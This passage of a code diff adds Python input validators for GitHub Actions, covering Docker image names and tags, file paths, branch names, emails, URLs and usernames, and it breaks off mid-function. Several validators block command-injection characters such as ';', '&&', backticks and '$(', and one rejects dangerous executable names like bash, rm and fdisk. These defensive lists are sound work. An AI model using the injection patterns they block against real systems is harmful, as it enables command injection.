"platforms": "docker_architectures",
"architectures": "docker_architectures",
"cache_from": "cache_mode",
"cache_to": "cache_mode",
"sbom": "sbom_format",
"registry": "registry_url",
"registry_url": "registry_url",
"tags": "docker_tags",
# File patterns
"file": "file_path",
"path": "file_path",
"file_path": "file_path",
"config_file": "file_path",
"dockerfile": "file_path",
"branch": "branch_name",
"branch_name": "branch_name",
"ref": "branch_name",
# Network patterns
"email": "email",
"url": "url",
"endpoint": "url",
"webhook": "url",
"repository_url": "repository_url",
"repo_url": "repository_url",
"scope": "scope",
"username": "username",
"user": "username",
# Boolean patterns
"dry_run": "boolean",
"draft": "boolean",
"prerelease": "boolean",
"push": "boolean",
"delete": "boolean",
"all_files": "boolean",
"force": "boolean",
"skip": "boolean",
"enabled": "boolean",
"disabled": "boolean",
"verbose": "boolean",
"debug": "boolean",
# Numeric patterns
"retries": "retries",
"retry": "retries",
"attempts": "retries",
"timeout": "timeout",
"timeout_ms": "timeout",
"timeout_seconds": "timeout",
"threads": "threads",
"workers": "threads",
"concurrency": "threads",
# Other patterns
"category": "category_format",
"cache": "package_manager_enum",
"package_manager": "package_manager_enum",
"format": "report_format",
"output_format": "report_format",
"report_format": "report_format",
}
return exact_matches.get(name_lower)
def _check_pattern_based_matches(self, name_lower: str) -> str | None: # noqa: PLR0912
"""Check for pattern-based matches."""
result = None
# Token patterns
if "token" in name_lower:
token_types = TOKEN_TYPES
for key, value in token_types.items():
if key in name_lower:
result = value
break
if result is None:
result = "github_token" # Default token type
# Docker patterns
elif name_lower.startswith("docker_"):
result = f"docker_{name_lower[7:]}"
# Version patterns
elif "version" in name_lower:
version_mappings = VERSION_MAPPINGS
for key, value in version_mappings.items():
if key in name_lower:
result = value
break
if result is None:
result = "flexible_version" # Default to flexible version
# File suffix patterns
elif name_lower.endswith("_file") and name_lower != "config_file":
file_types = FILE_TYPES
for key, value in file_types.items():
if key in name_lower:
result = value
break
if result is None:
result = "file_path"
# CodeQL patterns
elif name_lower.startswith("codeql_"):
result = name_lower
# Cache-related check (special case for returning None)
elif "cache" in name_lower and name_lower != "cache":
result = None # cache-related but not numeric
return result
def get_required_inputs(self) -> list[str]:
"""Get the list of required input names from rules.
Returns:
List of required input names
"""
return self._rules.get("required_inputs", [])
def get_validation_rules(self) -> dict[str, Any]:
"""Get the validation rules.
Returns:
Dictionary of validation rules
"""
return self._rules
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate inputs based on conventions and rules.
Args:
inputs: Dictionary of input names to values
Returns:
True if all inputs are valid, False otherwise
"""
valid = True
# First validate required inputs
valid &= self.validate_required_inputs(inputs)
# Get conventions and overrides from rules
conventions = self._rules.get("conventions", {})
overrides = self._rules.get("overrides", {})
# Validate each input
for input_name, value in inputs.items():
# Skip if explicitly overridden to null
if input_name in overrides and overrides[input_name] is None:
continue
# Get validator type from overrides or conventions
validator_type = self._get_validator_type(input_name, conventions, overrides)
if validator_type:
# Check if this is a required input
is_required = input_name in self.get_required_inputs()
valid &= self._apply_validator(
input_name, value, validator_type, is_required=is_required
)
return valid
def _get_validator_type(
self,
input_name: str,
conventions: dict[str, str],
overrides: dict[str, str],
) -> str | None:
"""Determine the validator type for an input.
Args:
input_name: The name of the input
conventions: Convention mappings
overrides: Override mappings
Returns:
The validator type or None if no validator found
"""
# Check overrides first
if input_name in overrides:
return overrides[input_name]
# Check exact convention match
if input_name in conventions:
return conventions[input_name]
# Check with dash/underscore conversion
if "_" in input_name:
dash_version = input_name.replace("_", "-")
if dash_version in overrides:
return overrides[dash_version]
if dash_version in conventions:
return conventions[dash_version]
elif "-" in input_name:
underscore_version = input_name.replace("-", "_")
if underscore_version in overrides:
return overrides[underscore_version]
if underscore_version in conventions:
return conventions[underscore_version]
# Fall back to convention mapper for pattern-based detection
return self._convention_mapper.get_validator_type(input_name)
def _apply_validator(
self,
input_name: str,
value: str,
validator_type: str,
*,
is_required: bool,
) -> bool:
"""Apply the appropriate validator to an input value.
Args:
input_name: The name of the input
value: The value to validate
validator_type: The type of validator to apply
is_required: Whether the input is required
Returns:
True if valid, False otherwise
"""
# Get the validator module and method
validator_module, method_name = self._get_validator_method(validator_type)
if not validator_module:
# Unknown validator type, skip validation
return True
try:
# Call the validation method
if hasattr(validator_module, method_name):
method = getattr(validator_module, method_name)
# Some validators need additional parameters
if validator_type == "github_token" and method_name == "validate_github_token":
result = method(value, required=is_required)
elif "numeric_range" in validator_type:
# Parse range from validator type
min_val, max_val = self._parse_numeric_range(validator_type)
result = method(value, min_val, max_val, input_name)
else:
# Standard validation call
result = method(value, input_name)
# Copy errors from the validator module to this validator
# Skip if validator_module is self (for internal validators)
if validator_module is not self and hasattr(validator_module, "errors"):
for error in validator_module.errors:
if error not in self.errors:
self.add_error(error)
# Clear the module's errors after copying
validator_module.errors = []
return result
# Method not found, skip validation
return True
except Exception as e:
self.add_error(f"Validation error for {input_name}: {e}")
return False
def _get_validator_method(self, validator_type: str) -> tuple[Any, str]: # noqa: C901, PLR0912
"""Get the validator module and method name for a validator type.
Args:
validator_type: The validator type string
Returns:
Tuple of (validator_module, method_name)
"""
# Lazy import validators to avoid circular dependencies
# Token validators
if validator_type in [
"github_token",
"npm_token",
"docker_token",
"namespace_with_lookahead",
]:
if "token" not in self._validator_modules:
from . import token
self._validator_modules["token"] = token.TokenValidator()
return self._validator_modules["token"], f"validate_{validator_type}"
# Docker validators
if validator_type.startswith("docker_") or validator_type in [
"cache_mode",
"sbom_format",
"registry_enum",
]:
if "docker" not in self._validator_modules:
from . import docker
self._validator_modules["docker"] = docker.DockerValidator()
if validator_type.startswith("docker_"):
method = f"validate_{validator_type[7:]}" # Remove "docker_" prefix
elif validator_type == "registry_enum":
method = "validate_registry"
else:
method = f"validate_{validator_type}"
return self._validator_modules["docker"], method
# Version validators
if "version" in validator_type or validator_type in ["calver", "semantic", "flexible"]:
if "version" not in self._validator_modules:
from . import version
self._validator_modules["version"] = version.VersionValidator()
return self._validator_modules["version"], f"validate_{validator_type}"
# File validators
if validator_type in [
"file_path",
"branch_name",
"file_extensions",
"yaml_file",
"json_file",
"config_file",
]:
if "file" not in self._validator_modules:
from . import file
self._validator_modules["file"] = file.FileValidator()
return self._validator_modules["file"], f"validate_{validator_type}"
# Network validators
if validator_type in [
"email",
"url",
"scope",
"username",
"registry_url",
"repository_url",
]:
if "network" not in self._validator_modules:
from . import network
self._validator_modules["network"] = network.NetworkValidator()
return self._validator_modules["network"], f"validate_{validator_type}"
# Boolean validator
if validator_type == "boolean":
if "boolean" not in self._validator_modules:
from . import boolean
self._validator_modules["boolean"] = boolean.BooleanValidator()
return self._validator_modules["boolean"], "validate_boolean"
# Numeric validators
if validator_type.startswith("numeric_range") or validator_type in [
"retries",
"timeout",
"threads",
]:
if "numeric" not in self._validator_modules:
from . import numeric
self._validator_modules["numeric"] = numeric.NumericValidator()
if validator_type.startswith("numeric_range"):
return self._validator_modules["numeric"], "validate_range"
return self._validator_modules["numeric"], f"validate_{validator_type}"
# Security validators
if validator_type in ["security_patterns", "injection_patterns", "prefix", "regex_pattern"]:
if "security" not in self._validator_modules:
from . import security
self._validator_modules["security"] = security.SecurityValidator()
if validator_type == "prefix":
# Use no_injection for prefix - checks for injection patterns
# without character restrictions
return self._validator_modules["security"], "validate_no_injection"
return self._validator_modules["security"], f"validate_{validator_type}"
# CodeQL validators
if validator_type.startswith("codeql_") or validator_type in ["category_format"]:
if "codeql" not in self._validator_modules:
from . import codeql
self._validator_modules["codeql"] = codeql.CodeQLValidator()
return self._validator_modules["codeql"], f"validate_{validator_type}"
# PHP-specific validators
if validator_type in ["php_extensions", "coverage_driver"]:
# Return self for PHP-specific validation methods
return self, f"_validate_{validator_type}"
# Package manager and report format validators
if validator_type in ["package_manager_enum", "report_format"]:
# These could be in a separate module, but for now we'll put them in file validator
if "file" not in self._validator_modules:
from . import file
self._validator_modules["file"] = file.FileValidator()
# These methods need to be added to file validator or a new module
return None, ""
# Default: no validator
return None, ""
def _parse_numeric_range(self, validator_type: str) -> tuple[int, int]:
"""Parse min and max values from a numeric_range validator type.
Args:
validator_type: String like "numeric_range_1_100"
Returns:
Tuple of (min_value, max_value)
"""
parts = validator_type.split("_")
if len(parts) >= 4:
try:
return int(parts[2]), int(parts[3])
except ValueError:
pass
# Default range
return 0, 100
def _validate_php_extensions(self, value: str, input_name: str) -> bool:
"""Validate PHP extensions format.
Args:
value: The extensions value (comma-separated list)
input_name: The input name for error messages
Returns:
True if valid, False otherwise
"""
import re
if not value:
return True
# Check for injection patterns
if re.search(r"[;&|`$()@#]", value):
self.add_error(f"Potential injection detected in {input_name}: {value}")
return False
# Check format - should be alphanumeric, underscores, commas, spaces only
if not re.match(r"^[a-zA-Z0-9_,\s]+$", value):
self.add_error(f"Invalid format for {input_name}: {value}")
return False
return True
def _validate_coverage_driver(self, value: str, input_name: str) -> bool:
"""Validate coverage driver enum.
Args:
value: The coverage driver value
input_name: The input name for error messages
Returns:
True if valid, False otherwise
"""
valid_drivers = ["none", "xdebug", "pcov", "xdebug3"]
if value and value not in valid_drivers:
self.add_error(
f"Invalid {input_name}: {value}. Must be one of: {', '.join(valid_drivers)}"
)
return False
return True

309
validate-inputs/validators/docker.py Normal file
View File

@@ -0,0 +1,309 @@
"""Docker-specific validators for container-related inputs."""
from __future__ import annotations
import re
from typing import ClassVar
from .base import BaseValidator
class DockerValidator(BaseValidator):
"""Validator for Docker-related inputs."""
VALID_ARCHITECTURES: ClassVar[list[str]] = [
"linux/amd64",
"linux/arm64",
"linux/arm/v7",
"linux/arm/v6",
"linux/386",
"linux/ppc64le",
"linux/s390x",
]
CACHE_MODES: ClassVar[list[str]] = ["max", "min", "inline"]
SBOM_FORMATS: ClassVar[list[str]] = ["spdx-json", "cyclonedx-json"]
REGISTRY_TYPES: ClassVar[list[str]] = ["dockerhub", "github", "both"]
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate Docker-specific inputs."""
valid = True
for input_name, value in inputs.items():
if "image" in input_name and "name" in input_name:
valid &= self.validate_image_name(value, input_name)
elif input_name == "tag" or input_name.endswith("-tag"):
valid &= self.validate_tag(value, input_name)
elif "architectures" in input_name or "platforms" in input_name:
valid &= self.validate_architectures(value, input_name)
elif "cache" in input_name and "mode" in input_name:
valid &= self.validate_cache_mode(value, input_name)
elif "sbom" in input_name and "format" in input_name:
valid &= self.validate_sbom_format(value, input_name)
elif input_name == "registry":
valid &= self.validate_registry(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Docker validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return Docker validation rules."""
return {
"image_name": "lowercase, alphanumeric, periods, hyphens, underscores",
"tag": "semantic version, 'latest', or valid Docker tag",
"architectures": self.VALID_ARCHITECTURES,
"cache_mode": self.CACHE_MODES,
"sbom_format": self.SBOM_FORMATS,
"registry": self.REGISTRY_TYPES,
}
def validate_image_name(self, image_name: str, name: str = "image-name") -> bool:
"""Validate Docker image name format.
Supports full Docker image references including:
- Simple names: myapp, nginx
- Names with separators: my-app, my_app, my.app
- Registry paths: registry.example.com/myapp
- Multi-part paths: docker.io/library/nginx
- Complex paths: registry.example.com/namespace/app.name
Args:
image_name: The image name to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not image_name or image_name.strip() == "":
return True # Image name is often optional
# Allow GitHub Actions expressions
if self.is_github_expression(image_name):
return True
# Docker image name pattern supporting registry paths with slashes
# Component: [a-z0-9]+ followed by optional (.|_|__|-+)[a-z0-9]+
# Path: optional (/component)* for registry/namespace/image structure
pattern = r"^[a-z0-9]+((\.|_|__|-+)[a-z0-9]+)*(/[a-z0-9]+((\.|_|__|-+)[a-z0-9]+)*)*$"
if re.match(pattern, image_name):
return True
self.add_error(
f'Invalid {name}: "{image_name}". Must contain only '
"lowercase letters, digits, periods, hyphens, and underscores. "
"Registry paths are supported (e.g., registry.example.com/namespace/image)",
)
return False
def validate_tag(self, tag: str, name: str = "tag") -> bool:
"""Validate Docker tag format.
Args:
tag: The tag to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not tag or tag.strip() == "":
self.add_error(f"Docker {name} cannot be empty")
return False
# Docker tags can be:
# - image:tag format (e.g., myapp:latest, nginx:1.21)
# - just a tag (e.g., latest, v1.2.3)
# - registry/image:tag (e.g., docker.io/library/nginx:latest)
# Allow GitHub Actions expressions
if self.is_github_expression(tag):
return True
# Very permissive Docker tag pattern
# Docker tags can contain letters, digits, periods, dashes, underscores, colons, and slashes
pattern = r"^[a-zA-Z0-9][-a-zA-Z0-9._:/@]*[a-zA-Z0-9]$"
if re.match(pattern, tag) or tag in ["latest"]:
return True
self.add_error(f'Invalid {name}: "{tag}". Must be a valid Docker tag')
return False
def validate_architectures(self, architectures: str, name: str = "architectures") -> bool:
"""Validate Docker architectures/platforms.
Args:
architectures: Comma-separated list of architectures
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not architectures or architectures.strip() == "":
return True # Often optional
# Allow GitHub Actions expressions
if self.is_github_expression(architectures):
return True
archs = [arch.strip() for arch in architectures.split(",")]
for arch in archs:
if arch not in self.VALID_ARCHITECTURES:
self.add_error(
f'Invalid {name}: "{arch}". Supported: {", ".join(self.VALID_ARCHITECTURES)}',
)
return False
return True
def validate_cache_mode(self, value: str, name: str = "cache-mode") -> bool:
"""Validate Docker cache mode values.
Args:
value: The cache mode value
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Cache mode is optional
if value in self.CACHE_MODES:
return True
self.add_error(f'Invalid {name}: "{value}". Must be one of: {", ".join(self.CACHE_MODES)}')
return False
def validate_sbom_format(self, value: str, name: str = "sbom-format") -> bool:
"""Validate SBOM (Software Bill of Materials) format values.
Args:
value: The SBOM format value
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # SBOM format is optional
if value in self.SBOM_FORMATS:
return True
self.add_error(f'Invalid {name}: "{value}". Must be one of: {", ".join(self.SBOM_FORMATS)}')
return False
def validate_registry(self, value: str, name: str = "registry") -> bool:
"""Validate registry enum values for docker-publish.
Args:
value: The registry value
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
self.add_error(f"Registry is required and cannot be empty in {name}")
return False
if value in self.REGISTRY_TYPES:
return True
self.add_error(
f'Invalid {name}: "{value}". Must be one of: {", ".join(self.REGISTRY_TYPES)}',
)
return False
def validate_namespace_with_lookahead(self, namespace: str, name: str = "namespace") -> bool:
"""Validate Docker namespace/organization name.
Args:
namespace: The namespace to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not namespace or namespace.strip() == "":
return True # Empty namespace is often valid
# Namespace must be lowercase, can contain hyphens but not at start/end
# No double hyphens allowed, max length 255
if len(namespace) > 255:
self.add_error(f'Invalid {name}: "{namespace}". Too long (max 255 characters)')
return False
# Check for invalid patterns
if namespace.startswith("-") or namespace.endswith("-"):
self.add_error(f'Invalid {name}: "{namespace}". Cannot start or end with hyphen')
return False
if "--" in namespace:
self.add_error(f'Invalid {name}: "{namespace}". Cannot contain double hyphens')
return False
if " " in namespace:
self.add_error(f'Invalid {name}: "{namespace}". Cannot contain spaces')
return False
# Must be lowercase alphanumeric with hyphens
pattern = r"^[a-z0-9]+(?:-[a-z0-9]+)*$"
if re.match(pattern, namespace):
return True
self.add_error(
f'Invalid {name}: "{namespace}". Must contain only '
"lowercase letters, digits, and hyphens (not at start/end)",
)
return False
def validate_prefix(self, prefix: str, name: str = "prefix") -> bool:
"""Validate Docker tag prefix.
Args:
prefix: The prefix to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
# Empty prefix is valid
if not prefix:
return True
# Prefix cannot contain spaces or special characters like @, #, :
invalid_chars = [" ", "@", "#", ":"]
for char in invalid_chars:
if char in prefix:
self.add_error(f'Invalid {name}: "{prefix}". Cannot contain "{char}" character')
return False
# Valid prefix contains alphanumeric, dots, dashes, underscores
pattern = r"^[a-zA-Z0-9._-]+$"
if re.match(pattern, prefix):
return True
self.add_error(
f'Invalid {name}: "{prefix}". Must contain only '
"letters, digits, periods, hyphens, and underscores",
)
return False
# Convenience methods for direct access
def validate_docker_image_name(self, value: str, name: str = "image-name") -> bool:
"""Alias for validate_image_name for convention compatibility."""
return self.validate_image_name(value, name)
def validate_docker_tag(self, value: str, name: str = "tag") -> bool:
"""Alias for validate_tag for convention compatibility."""
return self.validate_tag(value, name)
def validate_docker_architectures(self, value: str, name: str = "architectures") -> bool:
"""Alias for validate_architectures for convention compatibility."""
return self.validate_architectures(value, name)

360
validate-inputs/validators/file.py Normal file
View File

@@ -0,0 +1,360 @@
"""File and path validators."""
from __future__ import annotations
from pathlib import Path
import re
from .base import BaseValidator
class FileValidator(BaseValidator):
"""Validator for file paths, extensions, and related inputs."""
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate file-related inputs."""
valid = True
for input_name, value in inputs.items():
if "file" in input_name or "path" in input_name or "directory" in input_name:
valid &= self.validate_file_path(value, input_name)
elif "branch" in input_name:
valid &= self.validate_branch_name(value)
elif "extension" in input_name:
valid &= self.validate_file_extensions(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""File validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return file validation rules."""
return {
"file_path": "Relative paths only, no path traversal",
"branch_name": "Valid git branch name",
"file_extensions": "Comma-separated list starting with dots",
}
def validate_path(self, path: str, name: str = "path") -> bool:
"""Validate general file paths.
Args:
path: The file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not path or path.strip() == "":
return True # Path is often optional
# Allow GitHub Actions expressions
if self.is_github_expression(path):
return True
p = Path(path)
try:
safe_path = p.resolve(strict=True)
except FileNotFoundError:
self.add_error(f'Invalid {name}: "{path}". Path does not exist')
return False
# Use base class security validation
return self.validate_path_security(str(safe_path.absolute()), name)
def validate_file_path(self, path: str, name: str = "path") -> bool:
"""Validate file paths for security.
Args:
path: The file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not path or path.strip() == "":
return True # Path is often optional
# Allow GitHub Actions expressions
if self.is_github_expression(path):
return True
# Use base class security validation
if not self.validate_path_security(path, name):
return False
# Additional file path validation
# Check for valid characters
if not re.match(r"^[a-zA-Z0-9._/\-\s]+$", path):
self.add_error(f'Invalid {name}: "{path}". Contains invalid characters')
return False
return True
def validate_branch_name(self, branch: str, name: str = "branch") -> bool:
"""Validate git branch name.
Args:
branch: The branch name to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not branch or branch.strip() == "":
return True # Branch name is often optional
# Check for command injection
injection_patterns = [";", "&&", "||", "|", "`", "$("]
for pattern in injection_patterns:
if pattern in branch:
self.add_error(
f'Invalid {name}: "{branch}". '
f'Command injection pattern "{pattern}" not allowed',
)
return False
# Check for invalid git characters
if ".." in branch or "~" in branch or "^" in branch or ":" in branch:
self.add_error(
f'Invalid {name}: "{branch}". Contains invalid git branch characters',
)
return False
# Check for valid characters
if not re.match(r"^[a-zA-Z0-9/_.\-]+$", branch):
self.add_error(
f'Invalid {name}: "{branch}". '
"Must contain only alphanumeric, slash, underscore, dot, and hyphen",
)
return False
# Check for invalid start/end characters
if branch.startswith((".", "-", "/")) or branch.endswith((".", "/")):
self.add_error(
f'Invalid {name}: "{branch}". Cannot start/end with ".", "-", or "/"',
)
return False
# Check for consecutive slashes
if "//" in branch:
self.add_error(f'Invalid branch name: "{branch}". Cannot contain consecutive slashes')
return False
return True
def validate_file_extensions(self, value: str, name: str = "file-extensions") -> bool:
"""Validate file extensions format.
Args:
value: Comma-separated list of file extensions
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # File extensions are optional
extensions = [ext.strip() for ext in value.split(",")]
for ext in extensions:
if not ext:
continue # Skip empty entries
# Must start with a dot
if not ext.startswith("."):
self.add_error(
f'Invalid file extension: "{ext}" in {name}. Extensions must start with a dot',
)
return False
# Check for valid extension format
if not re.match(r"^\.[a-zA-Z0-9]+$", ext):
self.add_error(
f'Invalid file extension format: "{ext}" in {name}. '
"Must be dot followed by alphanumeric characters",
)
return False
# Check for security patterns
if self.validate_security_patterns(ext, f"{name} extension"):
continue
return False
return True
def validate_yaml_file(self, path: str, name: str = "yaml-file") -> bool:
"""Validate YAML file path.
Args:
path: The YAML file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
# Allow GitHub Actions expressions
if self.is_github_expression(path):
return True
if not self.validate_file_path(path, name):
return False
if path and not (path.endswith((".yml", ".yaml"))):
self.add_error(f'Invalid {name}: "{path}". Must be a .yml or .yaml file')
return False
return True
def validate_json_file(self, path: str, name: str = "json-file") -> bool:
"""Validate JSON file path.
Args:
path: The JSON file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not self.validate_file_path(path, name):
return False
if path and not path.endswith(".json"):
self.add_error(f'Invalid {name}: "{path}". Must be a .json file')
return False
return True
def validate_config_file(self, path: str, name: str = "config-file") -> bool:
"""Validate configuration file path.
Args:
path: The config file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not self.validate_file_path(path, name):
return False
# Config files typically have specific extensions
valid_extensions = [
".yml",
".yaml",
".json",
".toml",
".ini",
".conf",
".config",
".cfg",
".xml",
]
if path:
has_valid_ext = any(path.endswith(ext) for ext in valid_extensions)
if not has_valid_ext:
self.add_error(
f'Invalid {name}: "{path}". '
f"Expected config file extension: {', '.join(valid_extensions)}",
)
return False
return True
def validate_dockerfile_path(self, path: str, name: str = "dockerfile") -> bool:
"""Validate Dockerfile path.
Args:
path: The Dockerfile path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not path or path.strip() == "":
return True # Dockerfile path is often optional
# First validate general file path security
if not self.validate_file_path(path, name):
return False
# Check if it looks like a Dockerfile
# Accept: Dockerfile, dockerfile, Dockerfile.*, docker/Dockerfile, etc.
basename = Path(path).name.lower()
# Must contain 'dockerfile' in the basename
if "dockerfile" not in basename:
self.add_error(
f"Invalid {name}: \"{path}\". File name must contain 'Dockerfile' or 'dockerfile'",
)
return False
return True
def validate_executable_file(self, path: str, name: str = "executable") -> bool:
"""Validate executable file path.
Args:
path: The executable file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not path or path.strip() == "":
return True # Executable path is often optional
# First validate general file path security
if not self.validate_file_path(path, name):
return False
# Check for common executable extensions (for Windows)
# Check for potential security issues with executables
basename = Path(path).name.lower()
# Block obviously dangerous executable names
dangerous_names = [
"cmd",
"powershell",
"bash",
"sh",
"rm",
"del",
"format",
"fdisk",
"shutdown",
"reboot",
]
name_without_ext = Path(basename).stem
if name_without_ext in dangerous_names:
self.add_error(
f'Invalid {name}: "{path}". '
f"Potentially dangerous executable name: {name_without_ext}",
)
return False
return True
def validate_required_file(self, path: str, name: str = "file") -> bool:
"""Validate a required file path (cannot be empty).
Args:
path: The file path to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not path or path.strip() == "":
self.add_error(f"Required {name} path cannot be empty")
return False
# Validate the path itself
return self.validate_file_path(path, name)

391
validate-inputs/validators/network.py Normal file
View File

@@ -0,0 +1,391 @@
"""Network-related validators for URLs, emails, and other network inputs."""
from __future__ import annotations
import re
from .base import BaseValidator
class NetworkValidator(BaseValidator):
"""Validator for network-related inputs like URLs, emails, scopes."""
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate network-related inputs."""
valid = True
for input_name, value in inputs.items():
if "email" in input_name:
valid &= self.validate_email(value, input_name)
elif "url" in input_name or ("registry" in input_name and "url" in input_name):
valid &= self.validate_url(value, input_name)
elif "scope" in input_name:
valid &= self.validate_scope(value, input_name)
elif "username" in input_name or "user" in input_name:
valid &= self.validate_username(value)
return valid
def get_required_inputs(self) -> list[str]:
"""Network validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return network validation rules."""
return {
"email": "Valid email format",
"url": "Valid URL starting with http:// or https://",
"scope": "NPM scope format (@organization)",
"username": "Valid username without injection patterns",
}
def validate_email(self, email: str, name: str = "email") -> bool:
"""Validate email format.
Args:
email: The email address to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not email or email.strip() == "":
return True # Email is often optional
# Allow GitHub Actions expressions
if self.is_github_expression(email):
return True
# Check for spaces
if " " in email:
self.add_error(f'Invalid {name}: "{email}". Spaces not allowed in email')
return False
# Check @ symbol
at_count = email.count("@")
if at_count != 1:
self.add_error(
f'Invalid {name}: "{email}". Expected exactly one @ symbol, found {at_count}',
)
return False
local, domain = email.split("@")
# Validate local part
if not local:
self.add_error(f'Invalid {name}: "{email}". Missing local part before @')
return False
# Validate domain
if not domain:
self.add_error(f'Invalid {name}: "{email}". Missing domain after @')
return False
# Domain must have at least one dot
if "." not in domain:
self.add_error(f'Invalid {name}: "{email}". Domain must contain a dot')
return False
# Check for dots at start/end of domain
if domain.startswith(".") or domain.endswith("."):
self.add_error(f'Invalid {name}: "{email}". Domain cannot start/end with dot')
return False
# Check for consecutive dots
if ".." in email:
self.add_error(f'Invalid {name}: "{email}". Cannot contain consecutive dots')
return False
# Basic character validation
email_pattern = r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
if not re.match(email_pattern, email):
self.add_error(f'Invalid {name}: "{email}". Invalid email format')
return False
return True
def validate_url(self, value: str, name: str = "url") -> bool:
"""Validate URL format.
Args:
value: The URL to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
self.add_error(f"{name} cannot be empty")
return False
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Must start with http:// or https://
if not (value.startswith(("http://", "https://"))):
self.add_error(f'Invalid {name}: "{value}". Must start with http:// or https://')
return False
# Check for obvious injection patterns
injection_patterns = [";", "&", "|", "`", "$(", "${"]
for pattern in injection_patterns:
if pattern in value:
self.add_error(f'Potential security injection in {name}: contains "{pattern}"')
return False
# Basic URL validation (with optional port)
url_pattern = r"^https?://[\w.-]+(?:\.[a-zA-Z]{2,})?(?::\d{1,5})?(?:[/?#][^\s]*)?$"
if not re.match(url_pattern, value):
self.add_error(f'Invalid {name}: "{value}". Invalid URL format')
return False
return True
def validate_scope(self, value: str, name: str = "scope") -> bool:
"""Validate scope format (e.g., NPM scope).
Args:
value: The scope to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Scope is optional
# NPM scope should start with @
if not value.startswith("@"):
self.add_error(f'Invalid {name}: "{value}". Must start with @')
return False
# Remove @ and validate the rest
scope_name = value[1:]
if not scope_name:
self.add_error(f'Invalid {name}: "{value}". Scope name cannot be empty')
return False
# Must start with lowercase letter
if not scope_name[0].islower():
self.add_error(
f'Invalid {name}: "{value}". Scope name must start with lowercase letter',
)
return False
# Check for valid scope characters
if not re.match(r"^[a-z][a-z0-9._~-]*$", scope_name):
self.add_error(
f'Invalid {name}: "{value}". '
"Scope can only contain lowercase letters, numbers, dots, "
"underscores, tildes, and hyphens",
)
return False
# Check for security patterns
return self.validate_security_patterns(value, name)
def validate_username(self, username: str, name: str = "username") -> bool:
"""Validate username with injection protection.
Args:
username: The username to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not username or username.strip() == "":
return True # Username is often optional
# Check for command injection patterns
injection_patterns = [";", "&&", "||", "|", "`", "$(", "${"]
for pattern in injection_patterns:
if pattern in username:
self.add_error(
f'Invalid {name}: "{username}". Command injection patterns not allowed',
)
return False
# Check length (GitHub username limit)
if len(username) > 39:
self.add_error(
f"{name.capitalize()} too long: {len(username)} characters. "
"GitHub usernames max 39 characters",
)
return False
# GitHub username validation (also allow underscores)
if not re.match(r"^[a-zA-Z0-9](?:[a-zA-Z0-9_-]*[a-zA-Z0-9])?$", username):
self.add_error(
f'Invalid {name}: "{username}". '
"Must start and end with alphanumeric, can contain hyphens and underscores",
)
return False
return True
def validate_registry_url(self, value: str, name: str = "registry-url") -> bool:
"""Validate registry URL format.
Args:
value: The registry URL to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Registry URL is often optional
# Common registry URLs
known_registries = [
"https://registry.npmjs.org/",
"https://npm.pkg.github.com/",
"https://registry.yarnpkg.com/",
"https://pypi.org/simple/",
"https://test.pypi.org/simple/",
"https://rubygems.org/",
"https://nuget.org/api/v2/",
]
# Check if it's a known registry
for registry in known_registries:
if value.startswith(registry):
return True
# Otherwise validate as general URL
return self.validate_url(value, name)
def validate_repository_url(self, value: str, name: str = "repository-url") -> bool:
"""Validate repository URL format.
Args:
value: The repository URL to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Repository URL is often optional
# Common repository URL patterns
repo_patterns = [
r"^https://github\.com/[a-zA-Z0-9-]+/[a-zA-Z0-9._-]+(?:\.git)?$",
r"^https://gitlab\.com/[a-zA-Z0-9-]+/[a-zA-Z0-9._-]+(?:\.git)?$",
r"^https://bitbucket\.org/[a-zA-Z0-9-]+/[a-zA-Z0-9._-]+(?:\.git)?$",
]
for pattern in repo_patterns:
if re.match(pattern, value):
return True
# Otherwise validate as general URL
return self.validate_url(value, name)
def validate_hostname(self, hostname: str, name: str = "hostname") -> bool:
"""Validate hostname format.
Args:
hostname: The hostname to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not hostname or hostname.strip() == "":
return True # Hostname is often optional
# Check length (max 253 characters)
if len(hostname) > 253:
self.add_error(f'Invalid {name}: "{hostname}". Hostname too long (max 253 characters)')
return False
# Check for valid hostname pattern
# Each label can be 1-63 chars, alphanumeric and hyphens, not starting/ending with hyphen
